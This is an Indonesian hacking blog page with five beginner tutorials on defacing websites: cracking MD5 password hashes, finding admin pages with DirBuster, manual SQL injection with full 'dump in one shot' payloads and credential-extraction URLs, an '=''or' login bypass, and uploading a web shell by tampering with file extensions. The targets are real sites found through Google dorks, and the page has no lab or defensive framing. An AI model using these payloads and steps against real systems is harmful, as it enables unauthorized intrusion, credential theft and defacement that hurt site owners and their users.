Tempat para Developer Gaptek

AD BANNER
Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

02 September 2017

Tutorial Crack Password MD5

September 02, 2017 1
Assalamu'alaikum wr.wb

Siang guys!
Hari ini saya akan share tutorial crack password md5 dengan online tools. MD5 (Message-Diggest Algorithm 5) mempunyai panjang 32 karakter (16bit) yang sering digunakan oleh beberapa forum, cms, dll.

cara decrypt hash md5

Enkripsi yaitu teknik mengamankan sebuah data (plaintext) dan mengkonversinya menjadi bahasa yang tidak dimengerti oleh manusia (chippertext).
Dekripsi yaitu teknik mengembalikan data yang ter-enkripsi (chippertext) menjadi data yang dapat dibaca (plaintext) oleh manusia. Untuk gambarannya, bisa lihat gambar berikut.
tutorial crack password md5
Lanjut!


Bahan :
1. Data yang mau di Decrypt (password, pesan, dll)
2. Online Tools : hashkiller.co.ukmd5online.org atau bisa googling aja

Tutorial :
1. Buka salah satu online toolsnya. kali ini saya menggunakan tools dari hashkiller.co.uk
cara crack password md5


2. Masukkan hash md5nya. kalo ga ke Decrypt, coba pake online tools yang lain :v
cara crack hash md5


3. Cracked! Tinggal login ke halaman admin!

gampang kan?
oke sekian tutorial decrypt password md5,
mohon maaf bila ada kesalahan.

Wassalamu'alaikum wr.wb

31 August 2017

Tutorial Mencari Halaman Login Admin

August 31, 2017 1
Assalamu'alaikum wr.wb

Selamat siang guys!
kali ini saya akan share tutorial mencari halaman login admin. Tools untuk mencari halaman login admin kali ini yaitu DirBuster. DirBuster adalah tool bruteforce yang memungkinkan attacker untuk menebak-nebah sebuah directori web. Lanjut!

cara mencari halaman login admin

Bahan :
1. DirBuster.exe ( windows ) [ Download Disini via GoogleDrive ]
2. Directory List (wordlist) dalam bentuk TXT (sudah tersedia di dalam DirBuster)
3. Kesabaran


Tutorial :
1. Siapkan target yang mau kalian cari halaman loginnya.


2. Buka dirbusternya, masukan target dan directori listnya lalu klik start.
tutorial mencari halaman login admin dengan dirbuster


3. Tinggal tunggu hasilnya! Note: lamanya proses bruteforce, tergantung banyaknya wordlist.
cara mecari halaman login admin


4. Pada gambar diatas, telah kita temukan halaman login adminnya. Copy dan pastekan ke address bar.
cara menggunakan tools dirbuster


5. Tinggal login!

Gampang kan? masih ga ngerti? coba tanyakan di kolom komentar!
oke sekian tutorial hari ini,
Mohon maaf bila ada kesalahan.

Wassalamu'alaikum wr.wb

Tutorial Deface Teknik SQL Injection Manual (With DIOS)

August 31, 2017 4
Assalamu'alaikum wr.wb

Pagi guys!
Hari ini saya akan bagikan cara deface menggunakan teknik sql injection manual with DIOS. SQL Injection merupakan teknik Hacking dimana QUERY SQL di injectkan melalui URL yang selanjutnya akan diproses oleh komputer. Lalu apa itu DIOS? DIOS merupakan singkatan dari DUMP IN ONE SHOT. Maksud dari teknik ini adalah memunculkan seluruh isi database dalam satu queri saja. paham? Lanjut!

tutorial deface menggunakan teknik sql injecion

Bahan :
1. Dork SQL INJECTION :
- inurl:view.php?cid=
dork lainnya bisa dilihat disini

2. Mozilla with Tamper Data Addon (optional, kalo webnya gabisa upload php. jadi coba di bypass aja)


Tutorial :
1. Dorking target & pilih targetnya.
tutorial deface teknik sqli


2. Cek apakah VULN atau tidak dengan menambahkan karakter kutip ( ' ) dibelakang variabel ID nya. Note: jika VULN, maka akan muncul 'You have an error in your SQL syntax blablabla...' atau halaman webnya berubah menjadi kosong/error.
cth: site.co.li/index.php?id=69'
cara deface menggunakan teknik sqli


3. Nah, kalo error seperti gambar diatas, sekarang tinggal kita cari tau jumlah TABLE yang ada pada databasenya, cukup dengan menebak-nebak saja sih. Caranya tambahkan query ORDER BY serta jumlah tabel yang mau di cek.
cth: site.co.li/index.php?id=69+order+by+10--+-
teknik sql injection untuk pemula


4. Pada gambar diatas terlihat pagenya masih menunjukan error, otomatis jumlah tablenya gak nyampe 10 kan? kita turunin lagi jumlah tablenya sampai ga ada error.
cth: site.co.li/index.php?id=69+order+by+9--+-  <  Error; Unknown column '9' in 'order clause'
site.co.li/index.php?id=69+order+by+8--+-  <  Error; Unknown column '8' in 'order clause'
site.co.li/index.php?id=69+order+by+7--+-  <  Error; Unknown column '7' in 'order clause'
site.co.li/index.php?id=69+order+by+6--+-  <  Error; Unknown column '6' in 'order clause'
site.co.li/index.php?id=69+order+by+5--+-  <  No Error
tutorial deface teknik sql injection


5. Sekarang kita sudah tau berapa jumlah tablenya. Tinggal cari table yang VULNERABLE. Caranya masukan query UNION SELECT dan dibarengi jumlah tablenya serta tambahkan karakter minus ( - ) di belakang variable IDnya.
cth: site.co.li/index.php?id=-69+union+select+1,2,3,4,5--+-
tutorial deface teknik dump in one shot


6. Pada gambar diatas, muncul table nomor berapa saja yang VULNERABLE, disitulah exploitnya dimasukan. Caranya, lihat dulu nomer yang VULNERABLE, lalu masukan QUERY DIOS pada nomor yang vulnerable tadi.
cth: site.co.li/index.php?id=-69+union+select+1,EXPLOIT,3,4,5--+-

Exploit :

MadBlood DIOS :
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))

 ZEN with WAF DIOS:
(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
Nanti hasilnya akan seperti ini. Lalu cari table yang sekiranya berhubungan dengan akun ADMIN.
tutorial exploit sql injection


7. Ternyata terdapat table yang namanya "admins" sekaligus isi dari table admins nya sendiri (id,code,name,password,dll pada gambar itulah yang dinamakan kolomnya). Tinggal kita cari tau isi dari kolom yang kita inginkan seperti kolom username,password,email,dll. Caranya menggunakan query GROUP_CONCAT.
cth: site.co.li/index.php?id=-69+union+select+1,group_concat(id,0x3a,password,0x3a,name),3,4,5+from+admins--+-
tutorial deface untuk pemula


8. Sudah keliatan username & passwordnya kan? tapi passwordnya masih dalam keadaan dienkripsi (md5). Tinggal Crack saja passwordnya. Caranya Tutorial Crack Password MD5.


9. OK! GOT PASSWORD! tinggal login ke halaman adminnya! Cari halaman adminnya, biasanya dengan menambahkan /admin atau /administrator pada webnya. atau bisa gunakan Tutorial Mencari Halaman Login Admin Menggunakan DirBuster.
cth: site.co.li/admin
tutorial mencari halaman login admin


10. LOGGED IN! dengan user SUPER ADMIN! tinggal kita cari tempat upload script/shell.
tutorial crack password md5


11. Siapkan shell/script defacenya. lalu upload saja. Note: jika tidak bisa upload .php, lakukan Teknik Bypass Extension.
tutorial deface bagi pemula


12. UPLOADED! karena kita tadi nge-upload di form gambar, kita buka saja gambar/thumbnail yang muncul.
tutorial sql injection untuk pemula


13. Shell Terupload! tinggal eksekusi saja! kali ini saya hanya ntip file saja walaupun bisa ngindex. Note: Ngindex? Backup dulu nyet!
tutorial dump in one shot


14. TERTUSUK!
tutorial deface teknik dump in one shot


15. DONE!

gampang kan? masih bingung? tanyakan di kolom komentar!
Nitip nick juga imSoulHunterz_

oke sekian tutorial deface teknik sqli with dios,
mohon maaf bila ada kesalahan.

Wassalamu'alaikum wr.wb

30 August 2017

Tutorial Deface Teknik Bypass Admin Login

August 30, 2017 7
Assalamu'alaikum wr.wb

Sore guys!
Kali ini saya akan share tutorial deface menggunakan teknik bypass admin. Teknik bypass admin ini sering digunakan oleh saya sih, selain karena gampang, cocok juga buat pemula. Bypass Admin adalah teknik dimana queri sql dipaksa dimasukan pada form login yang nantinya akan dibaca oleh komputer sebagai sebuah intruksi login (karena intruksinya memaksa, jadi tanpa user&pass pun komputer akan memprosesnya). Langsung saja!

cara deface untuk pemula


Bahan :
1. Script/Shell
2. Mozilla 50.0 with Tamper Data Addon. Download [ Mozilla 50.0.exe via GoogleDrive ]

3. Dork :
- inurl:/backend/login.php intext:"login"
kembangkan sendiri dorknya, supaya dapet yang verawan :v

4. Exploit :
- '=''or'
exploit yang lainnya bisa dilihat disini



Tutorial :
1. Dorking target.

2. Masukan exploit pada form loginnya. jika exploitnya tidak berhasil, kalian bisa coba exploit yang lainnya DISINI. Note: tidak semua form login admin bisa di inject seperti ini. kalo gagal, mending cari target lain.
tutorial deface untuk pemula


2. Setelah login, cari halaman upload atau halaman add news atau apapun yang penting ada form uploadnya.
tutorial deface bagi pemula


3. Siapkan Shell/Script defacenya, tapi JANGAN dulu di upload. Untuk kali ini, saya memilih upload shell indoxploit. Note: karena target saya tidak mendukung upload php secara langsung, maka dari itu saya menggunakan Teknik Bypass Extension. sebelumnya juga extensi shell idx nya ditambah .jpg/.png dulu. Jika target kalian support upload php, lewat saja teknik ini, langsung upload saja dan skip ke STEP 8.
cara deface mudah untuk pemula


4. Buka Addon Tamper Data dan Klik "Start Tamper" lalu upload.
tutorial deface paling mudah


5. Nanti muncul popup seperti berikut, hilangkan centang "Continue Tampering" lalu klik "Tamper".
deface untuk pemula


6. Akan muncul popup baru lagi, pada tab POST_DATA cari shell/script yang kalian upload.
deface bagi pemula


7. Tinggal hapus saja extensi jpg/png nya. nanti hasilnya akan seperti berikut. Lalu klik OK.
deface mudah untuk pemula


8. Jika berhasil, maka akan nampak notif bahwa upload sukses.
tutorial mudah deface untuk pemula


9. Sekarang tinggal akses shell/script yang diupload. Caranya edit news/image/post yang kalian buat tadi, lalu cari THUMBNAIL gambarnya dan DRAG & DROP ke AddressBar. lihat gambar.
tutorial deface bypass admin login


10. Maka hasilnya akan seperti ini.
cara deface teknik bypass admin


11. Tinggal EKSEKUSI. Kali ini saya hanya nitip file saja, tidak nebas INDEX.
tutorial bypass admin login

cara deface teknik bypass admin login


Selesai! Gampang kan? masih gagal? tanya di kolom komentar!

Oke sekian tutorial Deface Dengan Teknik Bypass Admin Login,
mohon maaf bila ada kesalahan.

Wassalamu'alaikum wr.wb

29 August 2017

Tutorial Bypass Extension Menggunakan Tamper Data

August 29, 2017 0
Assalamu'alaikum wr.wb

Siang guys!
Kali ini, saya akan bagikan cara bypass extension. Bypass extension sering digunakan saat kita sedang mau deface nih, pas mau upload shell/sc deface ehh malah ditolak (Extension Not Supported blablabla...). Sedih kan? pasti!. oke tanpa basabasi! langsung!

tutorial bypass shell

Bahan :
1. Script/Shell yang akan di upload
2. Mozilla Firefox v50.0 (saya sendiri menggunakan versi ini. untuk versi diatasnya, kayanya ga support deh :v). Download [ Mozila 50.0_x86.exe ] via GoogleDrive.
3. Addons Tamper Data


Tutorial :
1. Dorking targetnya.


2. Login pake user ADMIN. terserah gimanapun caranya, pokonya yg penting pake user admin. dan cari halaman upload/add news/add images/dll.


3. Pilih Script/Shell yang mau di upload. JANGAN dulu di upload.
cara bypass ekstensi


4. Buka Addons Tamper Data. Klik "Start Tamper". Baru klik upload.
cara bypass extension


5. Nanti akan terbuka jendela baru, lalu hilangkan centang "Continue Tampering" dan klik "Tamper".
tutorial tamper data pemula


6. Nanti  keluar jendela baru lagi. pada tab POST_DATA, cari teks/file yang tadi diupload. lihat gambar!
tutorial tamper data menggunakan mozila


7. lalu hapus saja ekstensi .jpg/.png nya. lihat gambar!
cara bypass shell menggunakan addons


8. Setelah itu, klik OK saja.
bypass shell menggunakan mozila


9. Sekarang tinggal akses script/shell yang telah diupload tadi. Masuk ke halaman upload tadi dan DRAG&DROP THUMBNAIL ke Addressbar.
cara bypass ekstensi php


10. Taraa! berhasil!
cara upload shell menggunakan tamper data


Gampang kan? masih ga ngerti? tanyakan di kolom komentar!

oke sekian tutorial bypass extension atau bypass shell kali ini,
mohon maaf bila ada kesalahan.

Wassalamu'alaikum wr.wb
AD BANNER